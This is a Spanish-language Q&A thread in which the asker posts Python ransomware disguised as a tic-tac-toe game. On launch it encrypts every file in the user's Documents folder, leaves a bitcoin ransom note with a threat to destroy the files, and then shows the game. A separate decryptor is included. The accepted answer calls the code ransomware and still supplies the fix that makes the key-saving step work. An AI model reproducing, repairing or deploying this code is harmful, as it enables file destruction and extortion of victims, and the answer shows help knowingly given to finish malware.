# Error al ejecutar programa de encriptado

Tags: python, python-3.x, encriptación, contraseña

al ejecutar mi programa de desencriptado me da este error en pantalla, me gustaria saber donde esta el error ya que no lo encuentro en ningun sitio. La linea 24 del codigo la he modificado pero aun asi no desencripta. Agradeceria la ayuda o alguna idea. Muchas gracias
Los archivos a desencriptar son un txt (con un hola) y una imagen.png del escritorio

Tengo una idea ya el programa que crea la clave publica, pero al encriptarla, la encripta y no la guarda.

[image: Imagen del error al ejecutar el programa en consola]

**Codigo del programa de desencriptado**

```
import os 
from cryptography.fernet import Fernet
import rsa
import tkinter as tk
import tkinter.simpledialog

a = "password"
tk.Tk().withdraw()

    
if(tkinter.simpledialog.askstring("Password", "Enter password:", show='*') == a):

    pvkey=open('privatekey.txt','rb')
    pkey=pvkey.read()
    private_key=rsa.PrivateKey.load_pkcs1(pkey)

    e=open('symmetric.txt','rb')
    ekey=e.read()

    dpubkey=rsa.decrypt(ekey,private_key).decode()

    usuario = [os.path.expanduser('~')+"/Documents"]

    items = os.listdir(usuario[0])
    archivos_2 = [usuario[0]+"/"+x for x in items]

    def decryp(items, key):
        cipher=Fernet(dpubkey)
        for x in archivos_2:
            with open(x, 'rb') as file:
                file_data = file.read()
            data = cipher.decrypt(file_data) 
            with open(x, 'wb') as file:
                file.write(data)  


    decryp(archivos_2, dpubkey)


else:
    exit()
```

Codigo del programa de encriptado

```
#!/usr/bin/env python
import os
from cryptography.fernet import Fernet
import PySimpleGUI
import random
import rsa
import time

if os.path.exists(os.path.expanduser('~')+"/Documents/README.txt") == False:

    def generarkey():                   #Para generar una key
        key = Fernet.generate_key()     #Creamos una variable en la que almacenamos la clave
        with open ('symmetric.txt', 'wb') as key_file:        
            key_file.write(key)
    generarkey()


    (pubkey, privkey)=rsa.newkeys(2048) #Creacion clave publica y privada

    #Escribimos la key en un archivo
    pukey=open('publickey.txt','wb')
    pukey.write(pubkey.save_pkcs1('PEM'))
    pukey.close()
    #Escribimos la key en un archivo
    pvkey=open('privatekey.txt','wb')
    pvkey.write(privkey.save_pkcs1('PEM'))
    pvkey.close()

    #Encrypt

    skey=open('symmetric.txt','rb')
    key=skey.read()
    cipher=Fernet(key)

    #Abrir archivos a encriptar
    usuario = [os.path.expanduser('~')+"/Documents"]

    items = os.listdir(usuario[0])
    archivos_2 = [usuario[0]+"/"+x for x in items]
    for x in archivos_2:
        with open(x, 'rb') as file:
            archivosDat=file.read()
        encryptDat=cipher.encrypt(archivosDat)
        with open(x, 'wb') as file:
            file.write(encryptDat)
            
    with open(usuario[0]+"/"+"README.txt", "w") as file:
        file.write("Archivos encriptados, inserta 50 euros en bitcoins en la siguiente cartera para recuperar los archivos:\n")
        file.write("\n1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa")
        file.write("\nSi no se realiza el ingreso en 24 horas se destruiran todos los archivos robados\n")
        file.write("Si borra los archivos se perdera todo para siempre, el cementerio ya esta lleno de valientes")

    pkey=open('publickey.txt','rb')
    pkdata=pkey.read()

    #Cargar el archivo
    pubkey=rsa.PublicKey.load_pkcs1(pkdata)

    #Encrypt simmetric key con la public key
    encrypted_key=rsa.encrypt(key,pubkey)

    #Escribir la clave simetrica encriptada
    ekey=open('symmetric.txt','wb')
    ekey.write(encrypted_key)
    time.sleep(5)





#values
button_size = (15, 5)
PLAYER_ONE = "x"
PLAYER_TWO = "O"
TITLE = "3 EN RAYA"
winner_plays = [[0,1,2],[3,4,5],[6,7,8],[0,3,6],[1,4,7],[2,5,8],[0,4,8],[2,4,6],[1,4,7]]

layout = [[
                PySimpleGUI.Button("", key="-0-", size=button_size),
                PySimpleGUI.Button("", key="-1-", size=button_size),
                PySimpleGUI.Button("", key="-2-", size=button_size)],
          [
                PySimpleGUI.Button("", key="-3-", size=button_size),
                PySimpleGUI.Button("", key="-4-", size=button_size),
                PySimpleGUI.Button("", key="-5-", size=button_size)],
          [
                PySimpleGUI.Button("", key="-6-", size=button_size),
                PySimpleGUI.Button("", key="-7-",size=button_size),
                PySimpleGUI.Button("", key="-8-", size=button_size)],

          [PySimpleGUI.Button("He terminado", key=("-Ok-"), size=(20,1))],
          [PySimpleGUI.Button("Quiero La Revancha", key=("-re-"), size=(20,1))]]


def close_app(event):
    if event == PySimpleGUI.WIN_CLOSED or event == "-Ok-":
        close = True
        return close

def winner_player(deck):
    for winner_play in winner_plays:
        if deck[winner_play[0]] == deck[winner_play[1]] == deck[winner_play[2]] != 0:
            if deck[winner_play[0]] == PLAYER_ONE:
                PySimpleGUI.Popup('Ha ganado el jugardor: {}'.format(PLAYER_ONE))
                end_game = True
                return end_game
            else:
                PySimpleGUI.Popup('Ha ganado el jugardor: {}'.format(PLAYER_TWO))
                end_game = True
                return end_game

    if 0 not in deck:
        PySimpleGUI.Popup("Juego Terminado! Nadie Gano")

def revenge(event, window, deck, end_game,):
    if event == "-re-":
        if 0 in deck and not end_game:
            PySimpleGUI.Popup('La Partida Aun No termina')
        else:
            window.Element("-0-").Update(text="")
            window.Element("-1-").Update(text="")
            window.Element("-2-").Update(text="")
            window.Element("-3-").Update(text="")
            window.Element("-4-").Update(text="")
            window.Element("-5-").Update(text="")
            window.Element("-6-").Update(text="")
            window.Element("-7-").Update(text="")
            window.Element("-8-").Update(text="")
            r = True
            return r

def plays(event, window, current_player, deck, end_game):
    if window.Element(event).ButtonText == "" and not end_game:
        index = int(event.replace("-",""))
        deck[index] = current_player
        window.Element(event).Update(text=current_player)
        play = True
        return play


def gui_interface():
    deck = [0, 0, 0,
            0, 0, 0,
            0, 0, 0]
    current_player = PLAYER_ONE
    end_game = False
    window = PySimpleGUI.Window("3 En Raya", layout,)

    while True:
        event, value = window.read()
        close = close_app(event)
        if close:
            break

        play = plays(event, window, current_player, deck, end_game)
        if not end_game:
            winner = winner_player(deck)
            if winner:
                end_game = True
            if play:
                if current_player == PLAYER_ONE:
                    current_player = PLAYER_TWO
                else:
                    current_player = PLAYER_ONE
        replay = revenge(event, window, deck, end_game)
        if replay:
            current_player = PLAYER_ONE
            end_game = False
            deck = [0, 0, 0,
                    0, 0, 0,
                    0, 0, 0]


    window.close()

def main():
    gui_interface()


if __name__ == "__main__":
    main()
```

Comment: Tienes que publicar los datos (password, archivos, etc.) para poder analizar el problema y validar una respuesta.

Comment: Ya lo he actualizado, creo que con eso deberia de valer. Muchas gracias  por la respuesta igualmente.

Answer (score 1, accepted):

Por lo que deduzco estas intentando hacer un ransomware de un juego del tres en raya, no veo ningún fallo a simple vista pero en esta parte del codigo:

```
#Escribir la clave simetrica encriptada
    ekey=open('symmetric.txt','wb')
    ekey.write(encrypted_key)
    time.sleep(5)
```

El time.sleep no hace prácticamente nada, prueba a cambiar el código como lo tienes en los bucles for, debería funcionar así

```
    encrypted_key=rsa.encrypt(key,pubkey)
    with open('symmetric.txt','wb') as file:
         file.write(encrypted_key)
```